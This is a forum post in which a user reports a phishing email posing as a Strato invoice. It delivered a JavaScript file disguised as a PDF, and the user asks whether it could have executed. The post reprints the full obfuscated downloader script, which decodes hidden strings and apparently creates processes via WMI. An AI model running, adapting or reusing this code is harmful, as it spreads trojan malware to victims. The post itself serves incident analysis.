Malicious JS Script (in fake PDF) "function catsville" (Trojan, ISB.Downloader!gen569)

Discussion in 'Scripting' started by itsmemario1, Mar 4, 2024.

  1. itsmemario1

    itsmemario1 MDL Expert

    Sep 10, 2012
    1,090
    298
    60
    #1 itsmemario1, Mar 4, 2024
    Last edited by a moderator: Mar 4, 2024
    Hi,

    an email by "[email protected]" had an PDF attached, but the additional file extension for it was .JS for javascript. It was disguised as a "strato invoice". (german provider/hoster)

    The email contained a bit.ly link, which led to the following adress.

    I clicked it in an external test environment :
    (so be carefull from here on!)

    "h**ps://rechnung-strato.codinsasac.com.pe/t7u8wc9"

    A click on the (bit.ly) link instantly downloaded the PDF file, with the additonal .JS extension.

    The website without the "t7u8wc9" shows a standard Apache2 Ubuntu Deafult page (It works!)
    h**ps://rechnung-strato.codinsasac.com.pe

    Hoster would be www.haulmer.com / .net. (???) in Chile.
    https://de.linkedin.com/company/haulmer?trk=ppro_cprof
    https://www.haulmer.com/

    Standard Windows says its a PDF, but of course fails to open it.

    ===================================
    The file itself starts with:

    //that OLIPHANT least case most freedom perversity THE kingdoms one civil PALACE AND most Edinburgh the factor upon truth too justification
    ===================================

    The file contains a lot of random text about scottish...nonsense.

    And it includes the following java in the middle part (and some at the end), which VirusTotal (and Windows) names:

    Trojan:Script/Wacatac.H!ml
    Downloader.Agent/JS!1.EEFF (CLASSIC)
    ISB.Downloader!gen569


    Question would be, as Windows failed to open the PDF, how are chances the JAVA code did indeed execute itself in the background?


    I added the java code below:


    PART1:
    Code:
    function catsville() {
    var rexes = [
        'rSkyWOmPkGxcR8olWP9uW5mDWRiyENBdGSkpwqSrpvddGCoRsKnpemk8zKldSW',
        'l0m7W7e',
        'WPebDq3cSwlcJSo/vSk7W6vAW7aC',
        'j8oGW5NdSZtdNWpcMSkTdbpdQK0c'
    ];
    catsville = function () {
        return rexes;
    };
    return catsville();
}
function petshop(polenta, troiger) {
    return cornish(polenta - 0x346, troiger);
}
function cornish(petshop, polenta) {
    var troiger = catsville();
    cornish = function (rexes, Petshop) {
        rexes = rexes - (-0x219a + 0x13 * 0x185 + 0x7 * 0xad);
        var Cornish = troiger[rexes];
        if (cornish['TkkIPW'] === undefined) {
            var Catsville = function (cAtsville) {
                var cOrnish = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                var pOlenta = '';
                var tRoiger = '';
                for (var rExes = 0x6 * 0x515 + -0x2519 * -0x1 + -0x4397, PEtshop, POlenta, CAtsville = -0x7fa * -0x1 + 0x7 * 0x531 + 0x1 * -0x2c51; POlenta = cAtsville['charAt'](CAtsville++); ~POlenta && (PEtshop = rExes % (0x20b8 + 0x1 * -0x1675 + -0xa3f) ? PEtshop * (0x2 * -0x1d8 + -0x2535 + 0x2925) + POlenta : POlenta, rExes++ % (0x1e8 + 0x4 + -0x2 * 0xf4)) ? pOlenta += String['fromCharCode'](-0x2 * -0x10d7 + -0x1 * 0x247f + 0x3d0 & PEtshop >> (-(-0xb22 + -0x2dd + -0x1 * -0xe01) * rExes & 0x247b + -0x1f * -0xd4 + -0xc6d * 0x5)) : 0xe89 + 0x1 * -0x389 + -0xb00) {
                    POlenta = cOrnish['indexOf'](POlenta);
                }
                for (var COrnish = 0x1a * -0x3 + 0x245b + -0x240d, TRoiger = pOlenta['length']; COrnish < TRoiger; COrnish++) {
                    tRoiger += '%' + ('00' + pOlenta['charCodeAt'](COrnish)['toString'](-0x1d87 * 0x1 + 0x2154 + -0x3bd))['slice'](-(0x1976 + 0x873 * -0x3 + -0x1b));
                }
                return decodeURIComponent(tRoiger);
            };
            var pEtshop = function (RExes, trOiger) {
                var caTsville = [], coRnish = -0xd * 0x171 + 0x1da4 + -0xae7, peTshop, poLenta = '';
                RExes = Catsville(RExes);
                var reXes;
                for (reXes = -0x7eb * 0x2 + 0x1c35 + 0xc5f * -0x1; reXes < 0x25 * 0xe5 + 0x1187 * 0x1 + -0x8 * 0x634; reXes++) {
                    caTsville[reXes] = reXes;
                }
                for (reXes = -0x27 * -0x7f + 0x1 * -0xd85 + -0x5d4; reXes < 0x1322 * -0x2 + 0x1 * 0x2485 + -0x1 * -0x2bf; reXes++) {
                    coRnish = (coRnish + caTsville[reXes] + trOiger['charCodeAt'](reXes % trOiger['length'])) % (-0x7d3 + -0x6e2 * -0x1 + 0x1f1 * 0x1);
                    peTshop = caTsville[reXes];
                    caTsville[reXes] = caTsville[coRnish];
                    caTsville[coRnish] = peTshop;
                }
                reXes = 0x5 * -0x799 + -0x143c + 0x3a39;
                coRnish = 0x2577 + 0x22cb + -0x4842;
                for (var PoLenta = -0x1 * 0x1102 + 0xe00 + 0x302; PoLenta < RExes['length']; PoLenta++) {
                    reXes = (reXes + (-0x2 * -0x65d + 0x3 * -0x2b3 + -0x4a0)) % (-0x1 * 0xeaf + 0x586 * -0x1 + 0x1535);
                    coRnish = (coRnish + caTsville[reXes]) % (-0xdb7 + 0x5d * -0x59 + -0x4 * -0xbc3);
                    peTshop = caTsville[reXes];
                    caTsville[reXes] = caTsville[coRnish];
                    caTsville[coRnish] = peTshop;
                    poLenta += String['fromCharCode'](RExes['charCodeAt'](PoLenta) ^ caTsville[(caTsville[reXes] + caTsville[coRnish]) % (0xf8e + -0x22af + 0x1421)]);
                }
                return poLenta;
            };
            cornish['LPGVYV'] = pEtshop;
            petshop = arguments;
            cornish['TkkIPW'] = !![];
        }
        var Rexes = troiger[-0x11 * 0x14e + -0x24a1 + 0x3acf * 0x1];
        var Troiger = rexes + Rexes;
        var Polenta = petshop[Troiger];
        if (!Polenta) {
            if (cornish['sMrOnV'] === undefined) {
                cornish['sMrOnV'] = !![];
            }
            Cornish = cornish['LPGVYV'](Cornish, Petshop);
            petshop[Troiger] = Cornish;
        } else {
            Cornish = Polenta;
        }
        return Cornish;
    };
    return cornish(petshop, polenta);
}
function procuretto(chippotle, monblan) {
    var retorter = annrand();
    procuretto = function (chilolsa, Retorter) {
        chilolsa = chilolsa - (-0xec1 + 0xc46 + 0x27b);
        var Chilolsa = retorter[chilolsa];
        return Chilolsa;
    };
    return procuretto(chippotle, monblan);
}
function randthatpeopleHadCHAPTER(chippotle) {
    var chilolsa = procuretto;
    var monblan = [];
    for (var retorter = -0x1 * -0x7fa + -0x123f + 0x1 * 0xa45; retorter < chippotle[chilolsa(0x0)]; retorter += 0x734 + -0x2b * 0xcd + -0x1 * -0x1b3d) {
        monblan[chilolsa(0x1)](parseInt(chippotle['substr'](retorter, -0x53 * -0x71 + 0x1a86 + -0x3f27), -0x153f + 0x1e9d + -0x94e));
    }
    return monblan;
}
function annrand() {
    var Procuretto = [
        'length',
        'push'
    ];
    annrand = function () {
        return Procuretto;
    };
    return annrand();
}
var rplacedthekingambition = randthatpeopleHadCHAPTER('0E1851503F0C623E1A756C4A08553F45122707150072163A0B1001691053791519346E19504C2B162B341D06090D1736085F451E6449477748587C447B1A564470671E6F466A02677E7B67515E076B48477A5B00086747746804601461626450584C5E6B017E587A05555B7C537E54407B680D4C7F5F4647411E7403760F1C014505481E640B035D5F530960514F5F7D6441590063517E66760640707D407007471D63556659797A55567454595078607F4256547B1C5575120143213B0A38054D650803282D49567A403E1D157B0A061136131169424F14352F0716035D09573B382012470C31275251281D531C151320310F5C6B57075C314D06613A27127316191A36395D5D2A6B071C315B672136336C0A52732A07052F29383F20395F135B4E625A250B20340C221215213C357A39271C5617081148594E5F43475D607341427E015F1B2E010B4C283538322A533520035F0555694E57095A210B487E422F1651214A577025544C275B285D281504421D2A060F534C0B1E3702535C29393028550371623036554A65055120334B7F7E5D48612F5A105913256451085A795A4040727641454050351F66793C182E12206F4933182138696E191C23511B');
var rSCOTTISHhas134that = randthatpeopleHadCHAPTER('623875314D31454B68524C7166304868734B6E74735266486E63724973775131784647756B684166584C6B6E737A7157663078365178724F646D4E754A3663764254325A7458364B4B4957687232597976566E3238546B41593152385450566274796C5A36526D48346D7749624B676C4E593879536A7772733241314737303477347832513932657366385668636A4F567075355267494A433471455175423676315667576F554F676446786C624A51537767614E356E51766E305754784E3865426A7147433171566759786156696B755A76654E6B74304F467574793834735148536A31644B5034304672687A7A6145506C344373753353746341534932576C706854433874514F666B586643535951556F6957417168575A5248424B377737734631536658476655706749585951624474376555396C3839366E726C504568795A773661477536684343554A5939424271376139526E736533536A755A34466C3855376C544137384236523751796B376D7134526E686777456368784C4D494937744C45425A72714163385656764E45736C497439783861784C6831634B7779784A41686E67354D384F514C6A4B61534F64466B445A494A7575513032');
var rmaintainingthekingdomsANDREWwhichwalls = '';
for (var rLENNOXvolumesystemwhen = 0; rLENNOXvolumesystemwhen < rplacedthekingambition.length; rLENNOXvolumesystemwhen++) {
    rmaintainingthekingdomsANDREWwhichwalls += String.fromCharCode(rplacedthekingambition[rLENNOXvolumesystemwhen] ^ rSCOTTISHhas134that[rLENNOXvolumesystemwhen % rSCOTTISHhas134that.length]);
}
var kxqvutewdjribazg = [
    petshop(0x346, '7[X3'),
    petshop(0x348, 'VXQ5'),
    petshop(0x349, 'Uw]('),
    rmaintainingthekingdomsANDREWwhichwalls,
    petshop(0x347, 'E*pJ')
];

    PART2:
    Code:
    var vyjfoihnqwzkcpes=""
var apynufseqzkltdjv = GetObject(kxqvutewdjribazg[0]);
var array = kxqvutewdjribazg;

var arrayLength = array.length;

if(1696 < 0 || 1696 >= arrayLength) {
  
var iyqevnprtkbjushl = 0;
}



for (var index = 0; index < 1696; index++) {
    var zmrshncjlxwbtvgp = array[1696 - index + 1];
    var mprtdeczfbulgqyi = array[1696 - index];
    var jkmlfbdpvqeirtoc = array[1696 - index + 2];
 
    iyqevnprtkbjushl = zmrshncjlxwbtvgp + mprtdeczfbulgqyi + jkmlfbdpvqeirtoc;
 
}

vyjfoihnqwzkcpes = iyqevnprtkbjushl;

    PART3:
    Code:
    apynufseqzkltdjv.Create(kxqvutewdjribazg[4]);

apynufseqzkltdjv.Create(kxqvutewdjribazg[1+0]);
apynufseqzkltdjv.Create(vyjfoihnqwzkcpes);